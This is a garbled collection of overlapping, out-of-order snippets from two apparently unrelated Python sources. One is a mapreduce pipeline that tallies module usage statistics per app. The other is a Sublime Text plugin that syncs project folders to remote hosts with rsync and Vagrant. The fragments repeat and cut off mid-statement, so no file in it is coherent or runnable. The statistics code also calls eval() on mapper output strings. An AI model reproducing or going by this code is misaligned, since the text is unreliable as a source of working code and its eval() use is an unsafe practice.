"= _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s:",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"guid, log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid())",
"class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f:",
"output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s',",
"Valley Belgium NV # # Licensed under the Apache License, Version 2.0 (the",
"in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app",
"self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline):",
"combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer",
"for stats in previous_combined_values: for module, count in stats.iteritems(): if module not in",
"run(self, output, current_date): results = [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield",
"key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if",
"'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': {",
"'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec':",
"not in combined: combined[module] = 1 else: combined[module] += 1 return combined def",
"else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date)",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"1 else: combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values): # type:",
"modules: if module not in combined: combined[module] = 1 else: combined[module] += 1",
"if DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values) json_line = json.dumps({'app_id':",
"list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values)",
"for the specific language governing permissions and # limitations under the License. #",
"GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters':",
"ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for filename in output: results.append((yield",
"type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class",
"%s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date",
"_combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {}",
"# # Unless required by applicable law or agreed to in writing, software",
"json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line)",
"dict of module, amount outputs = self.outputs.default.value # type: list[dict[int, int]] for output",
"express or implied. # See the License for the specific language governing permissions",
"with key app_id, value dict of module, amount outputs = self.outputs.default.value # type:",
"type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s',",
"_, timestamp = self.args # list of dicts with key app_id, value dict",
"new_values: # mapper returns a string modules = eval(v) if isinstance(v, basestring) else",
"DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id,",
"either express or implied. # See the License for the specific language governing",
"timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as",
"self.outputs.default.value) _, timestamp = self.args # list of dicts with key app_id, value",
"'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output =",
"logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values,",
"for module, count in stats.iteritems(): if module not in combined: combined[module] = count",
"\"r\") as f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats']",
"current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self,",
"run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for json_line in",
"d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app",
"{ 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2",
"output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield",
"the License. # You may obtain a copy of the License at #",
"# -*- coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV #",
"v for module in modules: if module not in combined: combined[module] = 1",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"combined: combined[module] = count else: combined[module] += count for v in new_values: #",
"def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for json_line",
"= %s', self.outputs.default.value) _, timestamp = self.args # list of dicts with key",
"# Copyright 2020 Green Valley Belgium NV # # Licensed under the Apache",
"key, combined) yield combined def reducer(app_id, values): # type: (str, list[dict[str, int]]) ->",
"'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards':",
"f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return",
"int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def",
"counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s'",
"'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader',",
"params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': []",
"(counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings):",
"for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline:",
"was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for",
"module in modules: if module not in combined: combined[module] = 1 else: combined[module]",
"with the License. # You may obtain a copy of the License at",
"stats.iteritems(): if module not in combined: combined[module] = count else: combined[module] += count",
"'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer',",
"GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values) json_line =",
"logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args # list of dicts",
"of module, amount outputs = self.outputs.default.value # type: list[dict[int, int]] for output in",
"if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"_combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s',",
"combined: %s', key, combined) yield combined def reducer(app_id, values): # type: (str, list[dict[str,",
"def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined =",
"DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output,",
"law or agreed to in writing, software # distributed under the License is",
"str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name,",
"the License for the specific language governing permissions and # limitations under the",
"+ redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user):",
"import json import logging import time import cloudstorage from mapreduce import mapreduce_pipeline from",
"= eval(v) if isinstance(v, basestring) else v for module in modules: if module",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl",
"def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if",
"# type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def",
"None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\")",
"yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def",
"if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key,",
"rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' %",
"previous_combined_values: for module, count in stats.iteritems(): if module not in combined: combined[module] =",
"yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was",
"self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args # list of dicts with",
"in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app)",
"cloudstorage.open(filename, \"r\") as f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] =",
"combined) yield combined def reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType",
"in compliance with the License. # You may obtain a copy of the",
"= { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] },",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params)",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def start_job():",
"'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values)",
"(str, str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name':",
"See the License for the specific language governing permissions and # limitations under",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"permissions and # limitations under the License. # # @@license_version:1.7@@ import datetime import",
"if isinstance(v, basestring) else v for module in modules: if module not in",
"'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec':",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid,",
"def reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id,",
"yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp",
"(list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {} for stats in previous_combined_values:",
"datetime import json import logging import time import cloudstorage from mapreduce import mapreduce_pipeline",
"else: combined[module] += count for v in new_values: # mapper returns a string",
"module not in combined: combined[module] = count else: combined[module] += count for v",
"key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id)",
"new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG:",
"key app_id, value dict of module, amount outputs = self.outputs.default.value # type: list[dict[int,",
"logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner",
"combined: combined[module] = 1 else: combined[module] += 1 return combined def combiner(key, new_values,",
"outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app =",
"previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s",
"= self.args # list of dicts with key app_id, value dict of module,",
"'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if",
"{} for stats in previous_combined_values: for module, count in stats.iteritems(): if module not",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"except in compliance with the License. # You may obtain a copy of",
"%s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values)",
"redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for",
"results = [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self):",
"# type: (str, str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params':",
"mapreduce_pipeline from pipeline import pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE,",
"= {} for stats in previous_combined_values: for module, count in stats.iteritems(): if module",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"governing permissions and # limitations under the License. # # @@license_version:1.7@@ import datetime",
"mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules)",
"%s combined: %s', key, combined) yield combined def reducer(app_id, values): # type: (str,",
"-*- # Copyright 2020 Green Valley Belgium NV # # Licensed under the",
"rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def",
"list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner",
"count else: combined[module] += count for v in new_values: # mapper returns a",
"} }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 }",
"combined = {} for stats in previous_combined_values: for module, count in stats.iteritems(): if",
"the specific language governing permissions and # limitations under the License. # #",
"def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter =",
"in modules: if module not in combined: combined[module] = 1 else: combined[module] +=",
"time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common",
"'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else",
"if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for",
"NV # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]])",
"= ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' %",
"%s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key,",
"combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield",
"self.outputs.default.value # type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None,",
"DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for filename",
"string modules = eval(v) if isinstance(v, basestring) else v for module in modules:",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
"dict[str, int] combined = {} for stats in previous_combined_values: for module, count in",
"class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for filename in output:",
"json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline):",
"import guid, log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'),",
"%s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s',",
"combined[module] = 1 else: combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values):",
"'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name"
] |
[
"False elif len(more) == 2: host = more[1] else: host = more[0] if",
"sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand):",
"\" entered\") return False elif len(more) == 2: host = more[1] else: host",
"paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window()",
"settings) if callback is not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w,",
"\"\"\"This module implements the Sublime Text 3 commands provided by remote.\"\"\" import os",
"= sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None: return False return",
"return True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you",
"found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None, None) # =============================================================================",
"vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return",
"= \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path you\"",
"0) def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w,",
"def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path)",
"print(\"To local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found",
"entered does not\" + \" appear to contain a host\") return False more",
"\"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) #",
"> 2: sublime_api.error_message(\"Unable to parse the remote path you\" + \" entered\") return",
"\"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path you\" +",
"do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote",
"userSelection): if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is",
"folder to remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync",
"parse the remote path you\" + \" entered\") return False elif len(more) ==",
"def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\",",
"return True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path,",
"sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) options = sync_api.default_rsync_options() found",
"len(parts) != 2: sublime_api.error_message(\"The remote path you entered does not\" + \" appear",
"or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"),",
"edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path) w",
"to a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0)",
"True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class",
"entered\") return False elif len(more) == 2: host = more[1] else: host =",
"implements the Sublime Text 3 commands provided by remote.\"\"\" import os import re",
"None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote",
"does not\" + \" appear to contain a host\") return False more =",
"if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None:",
"sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\",",
"found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None,",
"RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w",
"\"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a",
"None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a",
"def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\",",
"selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath,",
"path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None",
"\"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\",",
"\"\") return True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path",
"re import sys import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import",
"done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a",
"============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename =",
"\"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w =",
"on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if",
"= {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None:",
"# ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\" def",
"from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path):",
"= \"\" found = sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"]",
"import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for",
"Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3",
"run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w",
"options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not None and",
"you entered does not\" + \" appear to contain a host\") return False",
"or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\",",
"to remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a",
"view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None: return",
"# ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit,",
"provided by remote.\"\"\" import os import re import sys import sublime import sublime_plugin",
"found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand):",
"sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"),",
"<reponame>devaos/sublime-remote<gh_stars>1-10 # -*- coding: utf-8 -*- # # Copyright (c) 2014 <NAME> #",
"2: host = more[1] else: host = more[0] if host == \"vagrant\": vms",
"as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync",
"is None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions)",
"the Sublime Text 3 commands provided by remote.\"\"\" import os import re import",
"path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0:",
"============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\" def run(self,",
"len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings =",
"directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\",",
"local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path,",
"more[1] else: host = more[0] if host == \"vagrant\": vms = [\"Select VM",
"found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local",
"\"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"),",
"a host\") return False more = parts[0].split(\"@\") host = \"\" if len(more) >",
"sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) remotePath = \"\" found",
"if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path you\" + \"",
"class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local project path.\"\"\" def",
"remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local",
"path you\" + \" entered\") return False elif len(more) == 2: host =",
"if host == \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms)",
